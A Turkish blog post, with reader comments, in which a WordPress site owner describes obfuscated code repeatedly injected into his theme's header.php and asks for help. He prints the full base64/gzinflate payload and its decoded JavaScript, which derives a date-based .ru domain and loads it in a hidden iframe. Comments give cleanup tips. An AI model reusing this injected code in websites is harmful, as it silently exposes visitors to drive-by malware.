Sitenin Başına Gelen Sorunlar !

Öncelikle merhaba arkadaşlar. Son 45 gündür siteye bir şeyler oluyor ama inanın ne oluyor bende anlamadım. Birileri sürekli temanın header.php dosyasına şifreli bir kod yerleştiriyor. Sanırım yabancı birisi olması lazım, ya da yabancı kaynaklı toplu bir grup da olabilir. Geçen wmaracı forumunda da bir tane okurumuz bu konudan şikayet etmiş, haklı da. Ama inanın bu sorundan nasıl kurtulacağımı bilmiyorum 🙁 Dün yeni bir database ve kullanıcı adı ile yeniden kurdum sistemi ama bugün baktığımda yine o kodun yerleştirildiğini gördüm. Forumda da koddan bahsettim. Sağolsun bir arkadaş ilgilenip kodu çözmüş ama kodun çözülmüş halinden de hiçbir şey anlamadım. Kodu buraya da yazayım da belki birileri bu kodu kimin oluşturup hangi amaca hizmet ettiklerini söylebilir:

#c3284d#
echo(gzinflate(base64_decode(“1VpLc9tGDP4vPEn1WN73LkdRLzn31GPGnfE4cqyJY3lkNY9m8t/
LBfYBLkmJtBQ3zUHDULtYLPAB+AD5zfPtbvO0/32/+/b98a/Vl83j++2Xd9X6c3VR3TxU17Pqadc8bvfb/
bendTVf/ri92d/ez/75ejv/vl6tP988LB9XFedCLBZcMdV8Cs6aT+6cf7bGfxr/RgjefErRPEst4iNv/
vmtisXltfNSmLF5CfOfUvpNvK6bJRLEOljC/EHMwnHcLxG6EaBcs0dpkA1KKOm/iodLf0h+4qL2+7lRcT
++bvSK+sNi63UI2teivaD51IuFhi/hMaiDFxQsytBGjZHh6mabhcu9THVwgEwKn0N1pV5F9YAantWB06Zcw3Id
pCkjhkyiFRsjq2aiR1ZealQDSa4NILVzSRmsCkD2YQLIPHzHZGbtV41Gcb+N8SAFltZwkFdAMxMfo5vR5SxewVh
+xCFjLq4TeOIB6IR8MB4htTwmq1f+i7HcBRIskNk
76HIrx1iyFmqCPY6FhVbZ3Oh2lt/nDNpC0nQHEzQfliFFSusgwxl/T8VNtpp
pdjrV5GPVA4zy0uTpJYXjPAXCaeJ0UongKlE6ACOc799jmaLqooog
AK4+BsjBdOEMLzcESC84aZUUca2jEjJ8AyIcMQ14E/QGf2tvXu3lQG6BJzU2mA
f0BqwUekNAtBX0MYpxyVyd8QgKitpE64IVEHlCEoh5IRZNj
IB0SQ0M9FzyocRqwydc7Qx5xIDi/lTjL6+d9Ec7/4X26dQvETYaXtadDHP8/
hBirYAkeuf7F+ENTkYMWMu8lIEnsnmCUlaRKp4rBWIuFTXNWkUN4dmnCWwpzj+
IppAWKShyVggRYfQEq6AGeiyJOZA7bU9kADiMjyQADIA
DovJUmAI4itKtNYsxD/jzW/DJighW1fr2ZC1qPkgghkvnFGYM3O5Uz9Rp7UhGma2rmB3t+9NTjygKVA2HIXMm5SxbMd8H/e51gZCb1H34255q46EOr4OOTC3CFlANeHfMKzxloWgSr5zTLtVjKPyc24KVjPIAFBGS0t
rFJe0buu3P5TtxCWGFncJ/xqYZH3WiGph7w22B57jYqWE5Qg9NpEBjTU6PINYP+MLFYK8WKYPMr
2L676gJjR++DSbnA7UKjziI5rLspsrVf8BPxkqrOh+ktYibHP
cRCOAGEmljoFWbpFdwbIYLb1YeY6auGFsEVdCZ0rR9T1ZLJfoalJPnPhhrndQzjpv/0v3JCT
QfOHo7ZOlcAFlYD+FR5IKoGooOMYTa6yJtRwTBe8mgX0CASHAoJiWbsSolL4Cj0H2Ct
PUmy0SgoQ4Yafg+6BZuDLMKlSABV6Gdt
ZDEMjpNRkK/5T0i6jM1WDS+Sgunk4qSDSURbdVFyYCXe4adQB9A/xCkOtJpoIyjI7dXBCRMzSNBGV1C
+stKr6VAOiEcLVVxLR0B5ZaSszr3q7Rkdbqd85AV9EwrxHMCyS
UZx4IDSfPQfTTlE4c8VcxHgUliVuXcvP6
k65BfcwRAYKqeb9upICfTIlq4tLpdm9MTnaNhJ85kktVNgzS26GgDI5EUwYCsOk9CSDGb+hsGqb+YD
V86Mw4zGZHafxnmLjylw2AKLGmib2eriCLeMVI0YXQelI6pY/S2LL85lqVVfeQvbiu5a0uc33pSupm
SwweKctELnUh3AfLtforFlHt0TKO5PTYfPMUwh3+tKhlSxE12HabPDpxKTvY/J8AwFzRtmguVPXrfC
8B6nwZUJzmkG7GSuR6zkmoW6gdhr9TcYAU65z1YN62uS2rZLxHsByHr/H9hUAeegXEQNKkgCyhaY
ZszRTb5ES9eyju/OyMGhS0tWXWuDSiF0uFONLJMQAJsXbpZQgVmPpxFtE6BBOkNigFt4lpMDi+PNCB
qyIB50dm2xvoyk
WGr46Tb+Jc54RIiOLk6TUFxi6pjMSw
ZEC6B7i1KYayHDBX9DE6PsRZid8XcL3ivMKrComdY7p8ybIoKhFDBywNIAJLw9r8IKMo8SJbQpD
8TNIWT4ArSHVmTTdXbo9JZKMYJJRNYr3+OIV
6UXa3LkYxkWyfHh0QLX7YYWy5gyLtad8ajE50YclDvIMurCsmCudcjgnSSHag3UwP0fnTQFW3Ag
e4GMx4tamjC/Htc+F2WsMyuTcMtia+ZIpTDi7HSHqukA3+6Uf4gFhcL0U7hVAgartMNsS5T6ZLEa
vH89LDZz6rFopov71di+byqquXddjfbrNhyc9k0vfWb5m
HFLzbz7x9Xm2bB88Wf+93m8cO76m63/fT2/mb3dvt+XV3PHt99vL6abS7vf/vjZn+/uHvYejlX9
/MLzufz5Y/N3Yxxfcm+3qxWKzlv/ot/
w7Z4v739+9P6cT9fz56bdW+uwl+6/Qs=”)));
#/c3284d#

Şu da bu yukarıdaki kodun çözülmüş hali:

//eval
function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo – this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);}

function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = Math.ceil(d.getHours()/3);
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;}

function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min);}

function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = “buaxoqeriqwkgfkdyenzossqlxfqayvpr”.split(”);
var str = ”;
for(var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length – 1)]; } return str + ‘.’ + zone;} setInterval(function(){ try{ if(typeof iframeWasCreated == “undefined”){ var unix = Math.round(+new Date()/1000); var domainName = generatePseudoRandomString(unix, 16, ‘ru’); ifrm = document.createElement(“IFRAME”); ifrm.setAttribute(“src”, “http://”+domainName+”/in.cgi?15”); ifrm.style.width = “0px”; ifrm.style.height = “0px”; ifrm.style.visibility = “hidden”; document.body.appendChild(ifrm); iframeWasCreated = true; } }catch(e){iframeWasCreated = undefined;} }, 100); /*** called setInterval with function () { try { if (typeof iframeWasCreated == “undefined”) { var unix = Math.round(+ new Date / 1000); var domainName = generatePseudoRandomString(unix, 16, “ru”); ifrm = document.createElement(“IFRAME”); ifrm.setAttribute(“src”, “http://” + domainName + “/in.cgi?15”); ifrm.style.width = “0px”; ifrm.style.height = “0px”; ifrm.style.visibility = “hidden”; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ //jsunpack.url var s = function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo – this.R * hi; if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;}return

Benim tahminimce bu sorunun kaynağı hosting merkezinden kaynaklanıyor. Şu an enesilhan.net‘i barındırdığım hosting Netİnternet sunucularında barınıyor. Büyük ihtimallae hosting şirketini değiştirmenin vakti geldi. Eğer bunun nedeni hosting kaynaklı değilse lütfen söyleyin arkadaşlar. Ha bu arada şu dosya izinlerini, wp-config dosyalarını da felan kontrol ettim, ayrıca eklentilere de baktım ama bir sonuca varamadım. Bu işlerde deneyimi olan ve başına böyle bir olay gelmiş kimseler varsa yardım etmelerini bekliyorum. Allah’tan blog yedeklerim, database yedeklerimi sürekli alıyorum. Bakalım ne olacak bekleyip göreceğiz 🙁

Bu yazıdan önce yazmış olduğum "Bir Tema Değiştirme Öyküsü.." başlıklı yazımı da okumanızı tavsiye ederim.

Bu Yazıya Emoji İle Tepki Ver?

  • Beğen
  • Muhteşem
  • Hahaha
  • İnanılmaz
  • Üzgün
  • Kızgın

Herkese Merhabalar, ben Enes İLHAN. Gaziantep'te doğdum, Adana'da Büro Yönetimi ve Yönetici Asistanlığı bölümünü okudum ve 2012'de mezun oldum. Askerliğimi uzun dönem olarak, { acemiliği Ankara/Mamak'ta , usta birliğini ise Hatay/İskenderun'da } yapıp bitirmiş bulunmaktayım. Şimdi ise hayata atılmanın çabası içerisine girmiş bulunmakta olup iş bulma derdindeyim.

11 yorum

  1. kralizasyon   •  

    Enes abi sitene girdiğimde siten bir JS çalıştırmak istedi, izin verdim ardından anti-virusden “tehditler temizlendi” diye bir uyarı aldım.

    İlginç.

  2. Onur Batur   •  

    Açıkcası hocam ben böyle hataya rastlamadım ama bir değişiklik gördüm oda üst kısımda twitter çubuğu kalkmıştı 🙂

  3. GM   •  

    IE’den ve Firefox’tan girdim ama herhangi bir uyarı almadım. Düzeldi mi acaba?

  4. Çağrı   •  

    Enes,Hatayı görür görmez mail attım sana umarım erken müdehale anlamında yardımcı olabilmişimdir.
    Kolay gelsin kardeşim

  5. Münzevi Kişilik   •  

    Tam olarak terimleri anlayamasam da varolan problem umarım en kısa zaman çözülür ve Enes ve Blogu’na bir şey olmaz.
    Güzel paylaşımlarını her daim uğrar okuruz 🙂

  6. Fefhit   •  

    Malesef web tabanlı kolay yayılan bir virüs atağına uğramış bulunmaktasınız.Öyle ki siz sadece taşıyıcı konumundasınız.Bu tarz virüsler güvenlik düzeyi düşük ama tıklanma seviyesi iyi durumda olan web sitelerini hedef alıyorlar.Bir şekilde içeri sızdıktan sonra; sizin sitenizi bir çeşit anofel e dönüştürüyor.Yani siz pek hasar almıyorsunuz, -eğer ki banka veya önemli bilgilerin kullanıldığı site değilseniz- ama tecrübesiz ziyaretçilerin bilgisayarlarındaki java alt yapısına sızıyorlar.Sanki rutin java güncellemeleriymiş gibi güncelleme uyarısı veriyor.Her güncelleme yapıldığında pc de yaptığınız işlemlerin kaydı virüsü üreten kişinin veritabanına aktarılıyor.

    Çözüm için; bu kodu her sildiğinizde ototmatik ekleyen bir client enjekte edilmiş olmalı veya kodlarınızın arasına kod bloğu da eklemiş olabilirler.
    Bu bölümü bulmalısınız.Htacces e bile eklenmiş olabilir.Veyahut sizin alanınıza değil de firmaya da sızmış olabilir.Siz ana işlemleri kontol eden sayfalarınızı kontrol edin.Dikkatinizi çeken herhangi bir klasör vb. bulmaaya çalışın.

    NOT:Sitenin bir kenarına ziyaretçiler için şunu yazabilirsiniz “Sitedeki Java Uyarılarını Onaylamasınlar”

  7. Enes ILHAN   •     Yazar

    @kralizasyon,
    İzin vermeseydin keşke kardeşim. Sorunu hâla çözebilmiş değilim ama çözmek için uğraşıyorum.
    @Onur Batur,
    Evet hatanın orada olduğunu sanarak bir ara kaldırdım ama sonra tekrar eski haline dönderdim.
    @GM,
    Yok gürkan kardeşim düzelmedi. Ama wordpress’i bugünlerde yeniden kuracağım. Düzelmesini umut ediyorum bende.
    @Ali Arslan,
    Doğrudur hocam sıkıntı devam ediyor.
    @Çağrı,
    Allah razı olsun hocam sağolun ilgilenip uyardığınız için. Benden daha çok ilgi gösteriyorsunuz bazen çok teşekkürler.
    @Münzevi Kişilik,
    Ooo münzevi seni burada görmek sevindirici. Uzun zamandır göremiyordum hangi dağda kurt öldü acaba 🙂 Şaka yapıyorum tabi ki bakma sen. Çok teşekkür ederim yorumunu esirgemediğin için sağol 😉
    @Fefhit,
    Hocam çok sağolun allah razı olsun. Aradığım cevabı siz verdiniz. Bende bu yönergede sorunun ne olduğunu anlamış oldum. Tekrardan wordpress kuracağım umarım sorun çözülür. Çok teşekkür ederim bu teknik bilgi ile bizi bilgilendirdiğiniz için..

    • Fefhit   •  

      Ne demek. Kullanıcıların bilinçlenmesi benimde yararıma olur zaten.Bu tip sorunları oluşturanlara karşı bilinçlenmemiz gerekir.Ben teşekkür ederim

  8. Serkan   •  

    sitenize girerken zararlı yazılım uyarısı aldım. devam et deyince site açıldı (chrome). Yerinizde olsam tekrar bloggera geçmeyi düşünürdüm böyle sağlıklı olmuyor

  9. Süha Mete   •  

    Yazı eski ancak çok benzer bir kod benim de header.php dosyama bulaşıyordu.Aldığım birkaç önlem eksik kalmış demek ki sizin gibi.Benim analizlerim ve temizliğim şu yöndeydi.

    1-Temalar klasörünüzde başka temalar varsa sen kendi header.php dosyandan silsen de birkaç gün sonra seni tekrar geliyor.Yani kullanmadığınız temaları silin

    2-Virüsün kaynağını ise Enes eklentilerden olduğunu düşünüyorum.Özellikle cache veya sıkıştırma eklentileri.Çoğu kişi bu konulardan muzdarip.

    Son olarak senden bir isteğim var.Blogunu yeni buldum bir yirmi dakikadır blogundayım ve birazdan çıkacağım ancak hiç bir cache ve sıkıştırma eklentisi göremedim.Senden ricam bir cache eklentisi yazısı yazabilir misin? İyi bloglamalar 🙂

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Güvenlik Sorusu ? * Time limit is exhausted. Please reload the CAPTCHA.